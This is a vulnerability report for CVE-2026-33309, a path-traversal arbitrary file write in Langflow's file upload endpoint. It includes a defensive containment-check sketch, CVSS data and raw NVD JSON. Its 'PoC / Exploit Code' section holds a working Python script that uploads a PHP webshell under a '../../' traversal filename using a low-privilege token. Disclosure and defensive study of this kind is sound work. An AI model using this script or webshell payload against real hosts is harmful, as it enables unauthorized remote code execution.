Security Vulnerability Report
CVE-2026-33309 CVSS 9.9 CRITICAL

CVE-2026-33309

Published: 2026-03-24 13:16:03
Last Modified: 2026-03-24 19:17:16

Description

Langflow is a tool for building and deploying AI-powered agents and workflows. Versions 1.2.0 through 1.8.1 have a bypass of the patch for CVE-2025-68478 (External Control of File Name), leading to the root architectural issue within `LocalStorageService` remaining unresolved. Because the underlying storage layer lacks boundary containment checks, the system relies entirely on the HTTP-layer `ValidatedFileName` dependency. This defense-in-depth failure leaves the `POST /api/v2/files/` endpoint vulnerable to Arbitrary File Write. The multipart upload filename bypasses the path-parameter guard, allowing authenticated attackers to write files anywhere on the host system, leading to Remote Code Execution (RCE). Version 1.9.0 contains an updated fix.
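The description attributes the bypass to a storage layer with no boundary containment check of its own. The sketch below shows such a check as an added example; it is not Langflow's code or its 1.9.0 fix, and `contained_target`, `save_file`, `PathEscapeError`, the `user-a` owner id and the sample file names are hypothetical, constructed for illustration.

```python
import tempfile
from pathlib import Path


class PathEscapeError(ValueError):
    """Resolved target falls outside the caller's storage directory."""


def contained_target(root: Path, owner_id: str, file_name: str) -> Path:
    """Storage-layer check: resolve first, then require containment."""
    root = root.resolve()
    base = (root / owner_id).resolve()
    # resolve() collapses ".." and follows existing symlinks; joining an
    # absolute file_name discards base, which the check below also catches.
    target = (base / file_name).resolve()
    try:
        base.relative_to(root)
        target.relative_to(base)  # component-wise: "user-a-evil" != "user-a"
    except ValueError:
        raise PathEscapeError(f"{file_name!r} escapes {base}") from None
    if base == root or target == base:
        raise PathEscapeError("empty owner id or file name")
    return target


def save_file(root: Path, owner_id: str, file_name: str, data: bytes) -> Path:
    # Enforced here regardless of what the HTTP layer validated upstream.
    target = contained_target(root, owner_id, file_name)
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_bytes(data)
    return target


def demo() -> dict:
    """Feed constructed multipart-style file names to the storage layer."""
    names = ["report.txt", "sub/notes.md", "../../outside.txt",
             "/tmp/abs.txt", "../user-a-evil/x", ".."]
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "storage"
        for name in names:
            try:
                save_file(root, "user-a", name, b"constructed sample")
                results[name] = "written"
            except PathEscapeError:
                results[name] = "rejected"
    return results
```

Because the check runs inside `save_file`, a file name that reaches storage through a route the HTTP-layer validator does not cover is still refused.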

CVSS Details

CVSS Score: 9.9
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:* - VULNERABLE
Langflow 1.2.0 - 1.8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL (replace with actual target)
url = "http://target-host:3000/api/v2/files/"

# Attacker's authentication token (Low privilege required)
headers = {
    "Authorization": "Bearer <LOW_PRIVILEGE_TOKEN>"
}

# Malicious payload to write a webshell or backdoor
# The filename contains path traversal to bypass validation
payload_content = "<?php system($_GET['cmd']); ?>"

# The filename attempts to write outside the intended directory
files = {
    "file": ("../../var/www/html/shell.php", payload_content, "application/octet-stream")
}

try:
    response = requests.post(url, headers=headers, files=files)
    if response.status_code == 200:
        print("[+] Exploit successful! File written.")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")
```

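References

https://github.com/langflow-ai/langflow/security/advisories/GHSA-g2j9-7rj2-gm6c (Exploit, Mitigation, Vendor Advisory)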

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33309", "sourceIdentifier": "[email protected]", "published": "2026-03-24T13:16:02.983", "lastModified": "2026-03-24T19:17:15.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Langflow is a tool for building and deploying AI-powered agents and workflows. Versions 1.2.0 through 1.8.1 have a bypass of the patch for CVE-2025-68478 (External Control of File Name), leading to the root architectural issue within `LocalStorageService` remaining unresolved. Because the underlying storage layer lacks boundary containment checks, the system relies entirely on the HTTP-layer `ValidatedFileName` dependency. This defense-in-depth failure leaves the `POST /api/v2/files/` endpoint vulnerable to Arbitrary File Write. The multipart upload filename bypasses the path-parameter guard, allowing authenticated attackers to write files anywhere on the host system, leading to Remote Code Execution (RCE). Version 1.9.0 contains an updated fix."}, {"lang": "es", "value": "Langflow es una herramienta para construir y desplegar agentes y flujos de trabajo impulsados por IA. Las versiones 1.2.0 a 1.8.1 tienen un bypass del parche para CVE-2025-68478 (Control Externo del Nombre de Archivo), lo que lleva a que el problema arquitectónico raíz dentro de 'LocalStorageService' permanezca sin resolver. Debido a que la capa de almacenamiento subyacente carece de comprobaciones de contención de límites, el sistema depende completamente de la dependencia 'ValidatedFileName' de la capa HTTP. Este fallo de defensa en profundidad deja el endpoint 'POST /api/v2/files/' vulnerable a la escritura arbitraria de archivos. El nombre de archivo de la carga multipart omite la protección del parámetro de ruta, permitiendo a atacantes autenticados escribir archivos en cualquier lugar del sistema anfitrión, lo que lleva a la ejecución remota de código (RCE). 
La versión 1.9.0 contiene una corrección actualizada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-73"}, {"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.2.0", "versionEndExcluding": "1.9.0", "matchCriteriaId": "54961FCE-8971-4CCF-8E68-7B571195DFCD"}]}]}], "references": [{"url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-g2j9-7rj2-gm6c", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}